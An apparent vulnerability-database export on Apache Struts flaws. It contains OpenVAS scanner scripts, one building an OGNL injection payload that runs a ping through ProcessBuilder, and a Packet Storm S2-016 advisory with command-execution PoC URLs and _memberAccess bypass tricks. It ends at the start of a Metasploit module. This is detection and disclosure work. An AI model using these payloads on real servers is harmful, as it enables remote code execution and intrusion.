}\n\n c = \"{\" + pingcmd + \"}\";\n\n ex = \"%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):\" +\n \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.\" +\n \"opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().\" +\n \"clear()).(#context.setMemberAccess(#dm)))).(#p=new java.lang.ProcessBuilder(\" + c + \")).\" +\n \"(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}\";\n\n cgiArray = split( cgi, sep:\" \", keep:FALSE );\n\n urls = http_create_exploit_req( cgiArray:cgiArray, ex:urlencode( str:ex ) );\n foreach url( urls ) {\n\n req = http_get_req( port:port, url:url );\n res = send_capture( socket:soc, data:req, timeout:2, pcap_filter:string( \"icmp and icmp[0] = 8 and dst host \", this_host(), \" and src host \", get_host_ip() ) );\n data = get_icmp_element( icmp:res, element:\"data\" );\n\n if( data && ( win || check >< data ) ) {\n close( soc );\n report = 'It was possible to execute the command `' + cleancmd + '` on the remote host.\\n\\nRequest:\\n\\n' + req + '\\n\\nResponse:\\n\\n' + data;\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nclose( soc );\nexit( 0 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:25:42", "description": "This host is running Apache Struts and is\n prone to unspecified vulnerability.", "cvss3": {}, "published": "2016-11-18T00:00:00", "type": "openvas", "title": "Apache Struts Unspecified Vulnerability Nov16 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4436"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310809475", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809475", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_unspecified_vuln_nov16_lin.nasl 63355 2016-11-18 11:00:43 +0530 Nov$\n#\n# Apache Struts Unspecified Vulnerability Nov16 (Linux)\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809475\");\n script_version(\"2019-07-05T10:41:31+0000\");\n script_cve_id(\"CVE-2016-4436\");\n script_bugtraq_id(91280);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:41:31 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-11-18 14:16:36 +0530 (Fri, 18 Nov 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Apache Struts Unspecified Vulnerability Nov16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to unspecified vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to the method used to clean\n up action name can produce vulnerable payload based on crafted input.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to\n bypass certain security restrictions and perform unauthorized actions. This may\n lead to further attacks.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts Version 2.x before 2.3.29\n and 2.5.x before 2.5.1 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts Version 2.3.29\n or 2.5.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-035.html\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_unixoide\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appVer = get_app_version(cpe:CPE, port:appPort)){\n exit(0);\n}\n\nif(appVer =~ \"^2\\.\")\n{\n if(version_in_range(version:appVer, test_version:\"2.0.0\", test_version2:\"2.3.28.1\"))\n {\n fix = \"2.3.29\";\n VULN = TRUE ;\n }\n\n else if(version_is_equal(version:appVer, test_version:\"2.5\"))\n {\n fix = \"2.5.1\";\n VULN = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix);\n security_message(data:report, port:appPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:21:13", "description": "This host is running Apache Struts and is\n prone to security bypass vulnerability.", "cvss3": {}, "published": "2017-08-31T00:00:00", "type": "openvas", "title": "Apache Struts 'top' Object Access Security Bypass Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5209"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310811316", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811316", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_top_object_sec_bypass_vuln_nov16_lin.nasl 63355 2016-11-18 11:00:43 +0530 Nov$\n#\n# Apache Struts 'top' Object Access Security Bypass Vulnerability (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811316\");\n script_version(\"2019-07-05T10:41:31+0000\");\n script_cve_id(\"CVE-2015-5209\");\n script_bugtraq_id(82550);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:41:31 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-31 13:48:08 +0530 (Thu, 31 Aug 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Apache Struts 'top' Object Access Security Bypass Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to security bypass vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to due to an incorrect\n handling of the 'top' object in specially crafted request.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to\n bypass certain security restrictions and perform unauthorized actions. This may\n lead to further attacks.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts Version 2.x before 2.3.24.1 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts Version 2.3.24.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-026.html\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1033908\");\n script_xref(name:\"URL\", value:\"https://vuldb.com/?id.105878\");\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_unixoide\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appVer = get_app_version(cpe:CPE, port:appPort)){\n exit(0);\n}\n\nif(appVer =~ \"^2\\.\")\n{\n if(version_in_range(version:appVer, test_version:\"2.0.0\", test_version2:\"2.3.24\"))\n {\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"2.3.24.1\");\n security_message(data:report, port:appPort);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-07-17T14:24:36", "description": "This host is running Apache Struts and is\n prone to cross-site scripting vulnerability.", "cvss3": {}, "published": "2017-10-06T00:00:00", "type": "openvas", "title": "Apache Struts 'Problem Report' Cross-Site Scripting Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5169"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310812011", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812011", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts 'Problem Report' Cross-Site Scripting Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812011\");\n script_version(\"2019-07-05T10:41:31+0000\");\n script_cve_id(\"CVE-2015-5169\");\n script_bugtraq_id(76625);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:41:31 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-06 17:52:42 +0530 (Fri, 06 Oct 2017)\");\n ## Apache Struts contains a cross-site scripting vulnerability when devMode is left turned on\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Apache Struts 'Problem Report' Cross-Site Scripting Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to cross-site scripting vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an improper validation\n of input passed via the 'Problem Report' screen when using debug mode.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary script code in the browser of user in the context of the\n affected site.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts Versions 2.0.0 through 2.3.16.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts Version 2.3.20 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-025.html\");\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appVer = get_app_version(cpe:CPE, port:appPort)){\n exit(0);\n}\n\nif(appVer =~ \"^2\\.\")\n{\n if(version_in_range(version:appVer, test_version:\"2.0\", test_version2:\"2.3.16.3\"))\n {\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"2.3.20\");\n security_message(data:report, port:appPort);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-07-17T14:18:54", "description": "This host is running Apache Struts and is\n prone to security bypass vulnerability.", "cvss3": {}, "published": "2017-08-31T00:00:00", "type": "openvas", "title": "Apache Struts 'top' Object Access Security Bypass Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5209"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310811315", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811315", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_top_object_sec_bypass_vuln_win.nasl 63355 2016-11-18 11:00:43 +0530 Nov$\n#\n# Apache Struts 'top' Object Access Security Bypass Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811315\");\n script_version(\"2019-07-05T10:41:31+0000\");\n script_cve_id(\"CVE-2015-5209\");\n script_bugtraq_id(82550);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:41:31 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-31 13:39:09 +0530 (Thu, 31 Aug 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Apache Struts 'top' Object Access Security Bypass Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to security bypass vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to due to an incorrect\n handling of the 'top' object in specially crafted request.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to\n bypass certain security restrictions and perform unauthorized actions. This may\n lead to further attacks.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts Version 2.x before 2.3.24.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts Version 2.3.24.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-026.html\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1033908\");\n script_xref(name:\"URL\", value:\"https://vuldb.com/?id.105878\");\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_windows\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appVer = get_app_version(cpe:CPE, port:appPort)){\n exit(0);\n}\n\nif(appVer =~ \"^2\\.\")\n{\n if(version_in_range(version:appVer, test_version:\"2.0.0\", test_version2:\"2.3.24\"))\n {\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"2.3.24.1\");\n security_message(data:report, port:appPort);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-07-17T14:26:17", "description": "This host is running Apache Struts and is\n prone to unspecified vulnerability.", "cvss3": {}, "published": "2016-11-18T00:00:00", "type": "openvas", "title": "Apache Struts Unspecified Vulnerability Nov16 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4436"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310809474", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809474", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_unspecified_vuln_nov16_win.nasl 63355 2016-11-18 11:00:43 +0530 Nov$\n#\n# Apache Struts Unspecified Vulnerability Nov16 (Windows)\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809474\");\n script_version(\"2019-07-05T10:41:31+0000\");\n script_cve_id(\"CVE-2016-4436\");\n script_bugtraq_id(91280);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:41:31 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-11-18 11:00:43 +0530 (Fri, 18 Nov 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Apache Struts Unspecified Vulnerability Nov16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to unspecified vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to the method used to clean\n up action name can produce vulnerable payload based on crafted input.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to\n bypass certain security restrictions and perform unauthorized actions. This may\n lead to further attacks.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts Version 2.x before 2.3.29\n and 2.5.x before 2.5.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts Version 2.3.29\n or 2.5.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-035.html\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appVer = get_app_version(cpe:CPE, port:appPort)){\n exit(0);\n}\n\nif(appVer =~ \"^2\\.\")\n{\n if(version_in_range(version:appVer, test_version:\"2.0.0\", test_version2:\"2.3.28.1\"))\n {\n fix = \"2.3.29\";\n VULN = TRUE ;\n }\n\n else if(version_is_equal(version:appVer, test_version:\"2.5\"))\n {\n fix = \"2.5.1\";\n VULN = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix);\n security_message(data:report, port:appPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:27", "description": "", "cvss3": {}, "published": "2013-08-13T00:00:00", "type": "packetstorm", "title": "Struts2 2.3.15 OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2013-08-13T00:00:00", "id": "PACKETSTORM:122796", "href": "https://packetstormsecurity.com/files/122796/Struts2-2.3.15-OGNL-Injection.html", "sourceData": "`CVE Number: CVE-2013-2251 \nTitle: Struts2 Prefixed Parameters OGNL Injection Vulnerability \nAffected Software: Apache Struts v2.0.0 - 2.3.15 \nCredit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc. \nIssue Status: v2.3.15.1 was released which fixes this vulnerability \nIssue ID by Vender: S2-016 \n \nOverview: \nStruts2 is an open-source web application framework for Java. \nStruts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which \nleads to arbitrary Java method execution on the target server. This is \ncaused by insecure handling of prefixed special parameters (action:, \nredirect: and redirectAction:) in DefaultActionMapper class of Struts2. \n \nDetails: \n<About DefaultActionMapper> \n \nStruts2's ActionMapper is a mechanism for mapping between incoming HTTP \nrequest and action to be executed on the server. DefaultActionMapper is \na default implementation of ActionMapper. It handles four types of \nprefixed parameters: action:, redirect:, redirectAction: and method:. \n \nFor example, redirect prefix is used for HTTP redirect. \n \nNormal redirect prefix usage in JSP: \n<s:form action=\"foo\"> \n... \n<s:submit value=\"Register\"/> \n<s:submit name=\"redirect:http://www.google.com/\" value=\"Cancel\"/> \n</s:form> \n \nIf the cancel button is clicked, redirection is performed. \n \nRequest URI for redirection: \n/foo.action?redirect:http://www.google.com/ \n \nResopnse Header: \nHTTP/1.1 302 Found \nLocation: http://www.google.com/ \n \nUsage of other prefixed parameters is similar to redirect. \nSee Struts2 document for details. \nhttps://cwiki.apache.org/confluence/display/WW/ActionMapper \n \n<How the Attack Works> \n \nAs stated already, there are four types of prefixed parameters. \n \naction:, redirect:, redirectAction:, method: \n \nAll except for method: can be used for attacks. But regarding action:, \nit can be used only if wildcard mapping is enabled in configuration. \nOn the one hand, redirect: and redirectAction: are not constrained by \nconfiguration (thus they are convenient for attackers). \n \nOne thing that should be noted is that prefixed parameters are quite \nforceful. It means that behavior of application which is not intended \nto accept prefixed parameters can also be overwritten by prefixed \nparameters added to HTTP request. Therefore all Struts2 applications \nthat use DefaultActionMapper are vulnerable to the attack. \n \nThe injection point is name of prefixed parameters. \nExample of attack using redirect: is shown below. \n \nAttack URI: \n/bar.action?redirect:http://www.google.com/%25{1000-1} \n \nResponse Header: \nHTTP/1.1 302 Found \nLocation: http://www.google.com/999 \n \nAs you can see, expression (1000-1) is evaluated and the result (999) \nis appeared in Location response header. As I shall explain later, \nmore complex attacks such as OS command execution is possible too. \n \nIn DefaultActionMapper, name of prefixed parameter is once stored as \nActionMapping object and is later executed as OGNL expression. \nRough method call flow in execution phase is as the following. \n \norg.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter() \norg.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction() \norg.apache.struts2.dispatcher.Dispatcher.serviceAction() \norg.apache.struts2.dispatcher.StrutsResultSupport.execute() \norg.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse() \ncom.opensymphony.xwork2.util.TextParseUtil.translateVariables() \ncom.opensymphony.xwork2.util.OgnlTextParser.evaluate() \n \nProof of Concept: \n<PoC URLs> \n \nPoC is already disclosed on vender's web page. \nhttps://struts.apache.org/release/2.3.x/docs/s2-016.html \n \nBelow PoC URLs are just quotes from the vender's page. \n \nSimple Expression: \nhttp://host/struts2-blank/example/X.action?action:%25{3*4} \nhttp://host/struts2-showcase/employee/save.action?redirect:%25{3*4} \n \nOS Command Execution: \nhttp://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} \nhttp://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} \nhttp://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} \n \nObviously such attacks are not specific to blank/showcase application, \nbut all Struts2 based applications may be subject to attacks. \n \n<OS Command Execution and Static Method Call> \n \nAnother topic that I think worth mentioning is that PoC URLs use \nProcessBuilder class to execute OS commands. The merit of using this \nclass is that it does not require static method to execute OS commands, \nwhile Runtime class does require it. \n \nAs you may know, static method call in OGNL is basically prohibited. \nBut in Struts2 <= v2.3.14.1 this restriction was easily bypassed by \na simple trick: \n \n%{#_memberAccess['allowStaticMethodAccess']=true, \n@java.lang.Runtime@getRuntime().exec('your commands')} \n \nIn Struts v2.3.14.2, SecurityMemberAccess class has been changed to \nprevent the trick. However there are still some techniques to call \nstatic method in OGNL. \n \nOne technique is to use reflection to replace static method call to \ninstance method call. Another technique is to overwrite #_memberAccess \nobject itself rather than property of the object: \n \n%{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true), \n@java.lang.Runtime@getRuntime().exec('your commands')} \n \nProbably prevention against static method is just an additional layer \nof defense, but I think that global objects such as #_memberAccess \nshould be protected from rogue update. \n \nTimeline: \n2013/06/24 Reported to Struts Security ML \n2013/07/17 Vender announced v2.3.15.1 \n2013/08/10 Disclosure of this advisory \n \nRecommendation: \nImmediate upgrade to the latest version is strongly recommended as \nactive attacks have already been observed. It should be noted that \nredirect: and redirectAction: parameters were completely dropped and \ndo not work in the latest version as stated in the vender's page. \nThus attention for compatibility issues is required for upgrade. \n \nIf you cannot upgrade your Struts2 immediately, filtering (by custom \nservlet filter, IPS, WAF and so on) can be a mitigation solution for \nthis vulnerability. Some points about filtering solution are listed \nbelow. \n \n- Both %{expr} and ${expr} notation can be used for attacks. \n- Parameters both in querystring and in request body can be used. \n- redirect: and redirectAction: can be used not only for Java method \nexecution but also for open redirect. \n \nSee S2-017 (CVE-2013-2248) for open redirect issue. \nhttps://struts.apache.org/release/2.3.x/docs/s2-017.html \n \nReference: \nhttps://struts.apache.org/release/2.3.x/docs/s2-016.html \nhttps://cwiki.apache.org/confluence/display/WW/ActionMapper \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/122796/struts2315ognl-inject.txt"}, {"lastseen": "2016-12-05T22:20:28", "description": "", "cvss3": {}, "published": "2013-06-02T00:00:00", "type": "packetstorm", "title": "Apache Struts includeParams Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2013-06-02T00:00:00", "id": "PACKETSTORM:121847", "href": "https://packetstormsecurity.com/files/121847/Apache-Struts-includeParams-Remote-Code-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts includeParams Remote Code Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in Apache Struts \nversions < 2.3.14.2. A specifically crafted request parameter can be used to inject \narbitrary OGNL code into the stack bypassing Struts and OGNL library protections. \nWhen targeting an action which requires interaction through GET the payload should \nbe split having into account the uri limits. In this case, if the rendered jsp has \nmore than one point of injection, it could result in payload corruption. It should \nhappen only when the payload is larger than the uri length. \n}, \n'Author' => \n[ \n# This vulnerability was also discovered by unknown members of: \n# 'Coverity security Research Laboratory' \n# 'NSFOCUS Security Team' \n'Eric Kobrin', # Vulnerability Discovery \n'Douglas 